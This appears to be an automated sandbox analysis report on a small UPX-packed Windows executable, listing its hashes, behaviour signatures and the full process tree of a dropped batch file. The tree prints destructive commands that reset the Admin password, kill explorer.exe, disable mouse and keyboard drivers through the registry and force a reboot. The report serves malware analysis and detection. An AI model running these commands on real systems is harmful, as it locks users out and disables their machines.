Overview

overview

7

Static

static

7

575f9f1db9...5a.exe

windows7-x64

575f9f1db9...5a.exe

windows10-2004-x64

Analysis

  • max time kernel
    16s
  • max time network
    18s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/01/2024, 19:59

Sharing

Copy URL Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    575f9f1db963a8ceb32d0460c7283c5a.exe

  • Size

    25KB

  • MD5

    575f9f1db963a8ceb32d0460c7283c5a

  • SHA1

    2c5815a38175ba63b1b0e8c73e2a7e8f56995cb1

  • SHA256

    e6cd384040aeca36cd27ba8da7f084519a12bcc1da94749cfab0f72018f85796

  • SHA512

    166185f2fe6437c0cf0b989c6ed1304365a55e90486b3033970e9645b01ce894257125e15c37e563fda30d0b9b0479c96b54334798d1e59449f278c0bb779159

  • SSDEEP

    768:U1NAUsbxtT6sFst/3IrdlLUwSnbcuyD7UhO:U1NAUwtT6sFstwrbUPnouy8hO

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in System32 directory 1 IoCs
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\575f9f1db963a8ceb32d0460c7283c5a.exe
    "C:\Users\Admin\AppData\Local\Temp\575f9f1db963a8ceb32d0460c7283c5a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4B9F.tmp\EKLÝ ALBATROS MEGA.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2076
      • C:\Windows\SysWOW64\attrib.exe
        attrib -s -h -r -a c:\ntldr
        3⤵
        • Views/modifies file attributes
        PID:4784
      • C:\Windows\SysWOW64\attrib.exe
        attrib -s -h -r -a c:\boot.ini
        3⤵
        • Views/modifies file attributes
        PID:3456
      • C:\Windows\SysWOW64\net.exe
        net user Admin 753951456852
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Admin 753951456852
          4⤵
            PID:1652
        • C:\Windows\SysWOW64\attrib.exe
          attrib -s -h -r -a c:\windows\system32\taskmgr.exe
          3⤵
          • Drops file in System32 directory
          • Views/modifies file attributes
          PID:3864
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im explorer.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4996
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im wscript.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:216
        • C:\Windows\SysWOW64\reg.exe
          reg addHKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f
          3⤵
            PID:2148
          • C:\Windows\SysWOW64\reg.exe
            reg addHKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f
            3⤵
              PID:4668
            • C:\Windows\SysWOW64\shutdown.exe
              shutdown -r -c "Sistem top oldu canim, acil kapatmam lazim kusura bakma." -t 15
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1016
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x4 /state0:0xa3951055 /state1:0x41c64e6d
          1⤵
          • Modifies data under HKEY_USERS
          • Suspicious use of SetWindowsHookEx
          PID:3664

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\4B9F.tmp\EKLÝ ALBATROS MEGA.bat
                Filesize

                2KB

                MD5

                c5ffffbfbd2b7302ba0379b1255a33b7

                SHA1

                03e39ae4f42a43ed9cda88ddd836486f54a65a4f

                SHA256

                60e2813bd116f5a8ad3b38607b8865e33fa5aaae47aa65d9e5417e473051b134

                SHA512

                6ec94809e64d8ba52ddc42a760cb0fb4c7f5338c662f9e8f25188bfdbce086d0cc1dbfa20cb72af7bda13328bad7fc23ccb44bea98a069cbf8dce14d68961c55

                Download Submit

              • memory/4860-0-0x0000000000400000-0x0000000000413000-memory.dmp

                Filesize

                76KB

                Download

              • memory/4860-4-0x0000000000400000-0x0000000000413000-memory.dmp

                Filesize

                76KB

                Download